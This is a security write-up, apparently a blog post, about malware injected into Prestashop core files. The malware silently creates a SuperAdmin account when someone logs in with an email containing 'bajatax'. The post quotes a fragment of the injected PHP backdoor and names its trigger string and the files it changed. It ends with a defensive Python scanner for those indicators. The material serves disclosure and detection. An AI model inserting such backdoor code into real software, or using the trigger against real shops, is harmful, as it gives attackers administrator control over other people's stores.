According to W3Techs' data, Prestashop is still one of the more popular CMS choices for existing ecommerce websites, so it should come as no surprise that malware exists which specifically targets it. We found an infected Prestashop website carrying injected malware that automatically created a SuperAdmin-level Prestashop user whenever the website owner logged into the Prestashop backend.

The malware was injected into existing Prestashop core files:

./controllers/admin/AdminLoginController.php
./classes/Employee.php

The injected PHP code works by checking the contents of the $email variable, which by default stores the email address submitted when logging into Prestashop. If $email contains the string bajatax, a query is run to fetch every row from the _employee database table.

    $message = "------------+| Uz [ By BAJATAX ] |+------------\n";
    $message .= "url       : "."http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI']."\n";
    $message .= "email     : ".$email."\n";
    if(preg_match("/bajatax/i",$email)){
        $bajatax=Db::getInstance()->executeS('SELECT * FROM `'._DB_PREFIX_.'employee`');
        $passwd="bajatax";
        foreach($bajatax as $baja){
            $baja_object=new Employee();
            if(Validate::isEmail($baja['email'])){
                $baja_object->getByEmail($baja['email']);
                if(!empty($baja_object->getAssociatedShops()) && $baja_object->isSuperAdmin()){
                    $email=$baja['email'];

After the query has run, the PHP code uses Prestashop functions to create a new “employee” user for the email address containing the string bajatax and assigns it Super Admin privileges.

This means that once the malicious code has been injected, the attacker can simply attempt to log into the Prestashop backend; even though the email address they use does not exist as a Super Admin user, it gets created by the PHP code.
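As an added defensive check, not code from the original post, the Python script below scans the two core files named above for the indicators visible in the injected snippet (the $email trigger, the "By BAJATAX" banner and the employee-table dump) and reports which files carry them; the file paths and strings come from the page, the sample file contents and the directory layout it builds are constructed for the demonstration.

```python
import re
import tempfile
from pathlib import Path

# Indicators lifted from the injected snippet quoted above. The $email trigger and the banner
# are specific to this backdoor; a SELECT over the employee table can be legitimate, so it is weak.
STRONG = {
    "email_trigger": re.compile(r'preg_match\(\s*["\']/bajatax/i["\']\s*,\s*\$email\s*\)'),
    "banner": re.compile(r"By BAJATAX", re.I),
}
WEAK = {"employee_dump": re.compile(r"SELECT\s+\*\s+FROM\s+`'\._DB_PREFIX_\.'employee`")}
# Core files the post reports as modified, relative to the Prestashop root.
CORE_FILES = ("controllers/admin/AdminLoginController.php", "classes/Employee.php")

def scan_source(source: str) -> list[str]:
    """Sorted names of every indicator (strong or weak) found in one PHP source text."""
    return sorted(n for n, rx in {**STRONG, **WEAK}.items() if rx.search(source))

def is_infected(source: str) -> bool:
    """Flag a file only when a backdoor-specific (strong) indicator matches."""
    return any(rx.search(source) for rx in STRONG.values())

def scan_install(root: Path) -> dict[str, list[str]]:
    """Check the known core files under a Prestashop root; map flagged files to their hits."""
    findings = {}
    for rel in CORE_FILES:
        path = root / rel
        if path.is_file():
            src = path.read_text(errors="replace")
            if is_infected(src):
                findings[rel] = scan_source(src)
    return findings

# Constructed samples: the first reuses lines of the quoted snippet, the second is a
# hypothetical benign check that also reads $email and must not be flagged.
SAMPLE_INFECTED = r"""
$message = "------------+| Uz [ By BAJATAX ] |+------------\n";
if(preg_match("/bajatax/i",$email)){
    $bajatax=Db::getInstance()->executeS('SELECT * FROM `'._DB_PREFIX_.'employee`');
"""
SAMPLE_CLEAN = "if (Validate::isEmail($email)) { $employee = new Employee(); }\n"

def demo() -> dict[str, list[str]]:
    """Write both samples into a throwaway Prestashop-like tree and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for rel, body in zip(CORE_FILES, (SAMPLE_INFECTED, SAMPLE_CLEAN)):
            (root / rel).parent.mkdir(parents=True, exist_ok=True)
            (root / rel).write_text(body)
        return scan_install(root)
```

Run scan_install() against a real Prestashop root to check a live install; a clean core file should produce no strong hits, and any match is a cue to diff the file against a pristine copy of the same Prestashop release.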